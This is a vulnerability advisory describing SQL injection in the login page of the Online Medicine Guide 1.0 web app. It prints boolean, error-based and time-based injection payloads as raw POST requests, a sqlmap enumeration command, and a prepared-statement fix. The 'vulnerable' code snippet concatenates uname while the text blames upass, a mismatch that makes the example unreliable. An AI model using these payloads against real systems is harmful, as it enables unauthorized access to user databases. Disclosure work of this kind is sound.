
code-projects Online Medicine Guide 1.0 is vulnerable to SQL Injection
This document outlines a critical SQL injection vulnerability discovered in the Online Medicine Guide web application. The vulnerability allows unauthorized database access and poses significant security risks to the application and its users.
/login.phpThe vulnerability stems from insufficient input validation and sanitization in the /login.php file. The application directly concatenates user input from the upass parameter into SQL queries without proper sanitization or prepared statements.
Technical Root Cause:
/login.phpupass (POST)POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
uname=uLnf&upass=rZgo' OR NOT 1852=1852-- iPRx
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
uname=uLnf&upass=rZgo' AND EXTRACTVALUE(4672,CONCAT(0x5c,0x7176707071,(SELECT (ELT(4672=4672,1))),0x71717a7071))-- knKp
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
uname=uLnf&upass=rZgo' AND (SELECT 2089 FROM (SELECT(SLEEP(5)))zUlY)-- mWfa
The vulnerability was confirmed using sqlmap:
sqlmap -u "http://localhost:8000/login.php" --data="uname=admin&upass=test" -p upass --batch --dbs

upass parameterBefore (Vulnerable):
$query = "SELECT * FROM users WHERE username = '" . $_POST['uname'] . "'";
After (Secure):
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ?");
$stmt->execute([$_POST['uname']]);
Document Version: 1.0
Last Updated: 03/10/2025 (dd/mm/yyyy)